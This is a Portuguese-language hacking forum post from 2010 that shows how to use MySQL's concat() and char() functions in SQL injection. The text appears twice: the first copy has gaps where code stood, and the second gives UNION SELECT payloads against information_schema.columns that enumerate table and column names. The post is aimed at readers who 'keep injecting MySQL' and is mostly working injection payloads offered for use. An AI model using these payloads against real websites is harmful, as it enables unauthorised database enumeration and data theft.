Oi pessoal tudo bem? #mysteryguitarmanhere
Um bom tempo sem postar nada, somente respondendo tópicos eu decidi escrever alguma coisa pra colocar aqui, então segue abaixo.
Então, tava conversando com o Exploit e resolvi postar essa dica para os meninos que ficam injetando mySQL e até trabalham com o mySQL normalmente todos os dias.
É a função
Essa função mostra strings concatenadas e você também pode usar a função char() alias, pode usar qualquer outra função existente no mySQL que possa se executar via injeção de mySQL, não esquecendo dos tratamentos que a injeção passa pelo PHP.
e
Está por sua vez pode inserir valores em decimal (para quem não sabe são aqueles caracteres que são feitos com o atalho ALT+3 ALT+167)
Exemplos:
Isso retornarar algo do tipo: nametablenamecolumn
Sendo que o "nametable" e "namecolumn" são valores separados, a função concatenou os dois e mostrou o resultado.
A função apenas mostrar a string correspondente sendo o 58 ":"
Retorna algo do tipo: namecolumn:, a função concat() concatenou o valor do column_name com o valor do decimal 58 inserido pela função char()
Cuidado com o que vocês irão fazer, suas ações não dependem das minhas.
Se leu tudo e gostou, clica em obrigado.
desenvolvido por jb // diretório secreto - 2010
Um bom tempo sem postar nada, somente respondendo tópicos eu decidi escrever alguma coisa pra colocar aqui, então segue abaixo.
Então, tava conversando com o Exploit e resolvi postar essa dica para os meninos que ficam injetando mySQL e até trabalham com o mySQL normalmente todos os dias.
É a função
Código:
concat()
e
Código:
char()
Exemplos:
Código:
=0 union select concat(table_name,column_name),2,3,4 from information_schema.columns--
Sendo que o "nametable" e "namecolumn" são valores separados, a função concatenou os dois e mostrou o resultado.
Código:
=0 union select 1,char(58),3,4 from information_schema.columns--
Código:
=0 union select concat(column_name,char(58)),2,3,4 from information_schema.columns--
Código:
=0 union select 1,char(68,73,82,69,84,79,82,73,79,32,83,69,67,82,69,84,79),3,4 from information_schema.columns--
Se leu tudo e gostou, clica em obrigado.
desenvolvido por jb // diretório secreto - 2010
Comment